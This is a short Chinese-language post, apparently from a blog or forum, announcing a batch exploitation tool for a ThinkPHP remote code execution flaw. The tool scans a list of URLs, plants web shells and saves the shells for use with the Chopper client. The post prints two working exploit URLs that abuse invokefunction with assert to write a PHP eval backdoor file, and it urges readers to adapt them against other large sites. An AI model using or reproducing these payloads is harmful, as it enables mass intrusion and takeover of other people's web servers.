本来12.12就看到了,当时看了全球统计,也就30多万个站
mdzz,觉得没啥好搞的,昨天,骚海找到我,给做批量出来,自己的太慢了,稳定性不好
ok,花了一天时间,写了出来(其中还是一堆的问题,不过还行,能解决)
主要加了多线程、自动检测(poc证明不同版本exp不同,windows和liunux又不同,因此存在一个shell出多个密码覆盖重写的情况)
复现:
工具效果:
下载地址:下载链接
用法:exe目录有个url.txt即可,自动读取开始扫描,shell生成到shell.txt
然后直接上菜刀
主要exp:
/index.php/?s=index/\think\Container/invokefunction&function=assert&vars[0]=phpinfo().fputs(fopen('saohai.php','w'),'YC<?php @eval($_POST['yc']);?>')
/index.php/?s=index/\think\app/invokefunction&function=assert&vars[0]=phpinfo().fputs(fopen('saohai.php','w'),'YC<?php @eval($_POST['yc']);?>');
具体的其他各大网站自己去整合
有些是:
/index.php?s=
还有些:
/index.php/?s=